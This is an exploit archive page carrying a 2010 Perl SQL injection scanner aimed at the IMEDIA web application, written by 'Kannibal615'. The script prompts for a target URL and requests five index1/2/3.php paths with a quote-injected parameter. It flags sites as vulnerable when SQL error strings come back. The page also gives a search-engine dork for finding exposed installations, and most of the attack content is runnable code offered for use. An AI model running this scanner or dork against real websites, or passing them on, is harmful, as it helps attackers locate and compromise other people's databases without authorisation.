IMEDIA SQL Injection

IMEDIA SQL Injection: Posted May 20, 2010; Authored by kannibal615; IMEDIA suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 7f73fbb94004d970d0ff979aee09dcab1c1a58116fc6047b808c7eedf9b7f273; Download | Favorite | View

IMEDIA SQL Injection

# Exploit Titre: IMEDIA (index.php) SQL Injection Vulnerability
# Date: 19-05-2010
# Auteur: Kannibal615
# Link Software: N/A
# Version: N/A
# Testé sur: ALL
# CVE: N/A
# Code: 

# DORK : Powered by: Con-Imedia


#!usr/bin/perl -w

use HTTP::Request;
use LWP::UserAgent;

system ("cls");
print "\n";
print "  @@    @@  @@@@@@     @@    @@    @@@@    @@@@@@@  @@  @@   @@@@@@@  @@@@@\n";
print "  @@    @@  @@   @@    @@    @@   @@  @@   @@       @@ @@    @@       @@   @@\n";
print "  @@    @@  @@ @@@     @@@@@@@@  @@    @@  @@       @@@@     @@@@@@   @@   @@\n";
print "   @@  @@   @@ @@@     @@@@@@@@  @@@@@@@@  @@       @@ @@    @@@@@@   @@ @@\n";
print "    @@@@    @@   @@    @@    @@  @@    @@  @@       @@  @@   @@       @@   @@\n";
print "     @@     @@@@@@     @@    @@  @@    @@  @@@@@@@  @@   @@  @@@@@@@  @@    @@\n\n";
print "                  LA ILAH ILLA ALLAH MOUHAMED RASOUL ALLAH\n\n";
print "\n\n";
print "[*]Coded By: Kannibal615 > Tunisian Genius Security > zn[at]live[dot]de\n\n";
print "[*]Greetz 1: My Best Friend AYMEN > THE P!RATOR\n";
print '[*]Greetz 2: Pc-InseCt/alghaking/emptyzero/V!Ru$_T4ckJ3n';
print "\n[*]Greetz 3: To All VBHACKER.NET Members\n";
print "[*]Dork    : Powered by: Con-Imedia\n";
print "[*]Usage   : k615>[target here]\n";
print "[*]Exemple : k615> www.target.com\n";
print "\n";
print "k615>";

$input=<>;
chomp $input;

if ( $input !~ /^http:/ ) {
$input = 'http://' . $input;
}
if ( $input !~ /\/$/ ) {
$input = $input . '/';
}


@path=('index1.php?linkid=999.9"','index1.php?sublinkid=999.9"','index1.php?linkid=&sublink=999.9"',
'index2.php?linkid=999.9"','index3.php?day=999.9"');

foreach $ways(@path){

$final=$input.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if($response->content =~ /sql/ ||
$response->content =~ /SQL error/ ||
$response->content =~ /SQL/ ||
$response->content =~ /syntax/ ||
$response->content =~ /Invalid query/ ||
$response->content =~ /your SQL/ ||
$response->content =~ /MySQL/ ||
$response->content =~ /at line 1/ ||
$response->content =~ /MySQL server/ ||
$response->content =~ /version for/ ||
$response->content =~ /Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near/ ||
$response->content =~ /fetch/
){
print "[+] Vulnerable -> $final\n";
}
else{
print "[-] Not Vulner <- $final\n";
}
}
print "\n\nSOBHAN ALLAH\n";
print "press enter to exit";
$enter=<>;




#db-exploit 19-05-2010
#Coded By Kannibal615
#Tunisian Genius Security

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

IMEDIA SQL Injection

IMEDIA SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

IMEDIA SQL Injection

Share This

IMEDIA SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems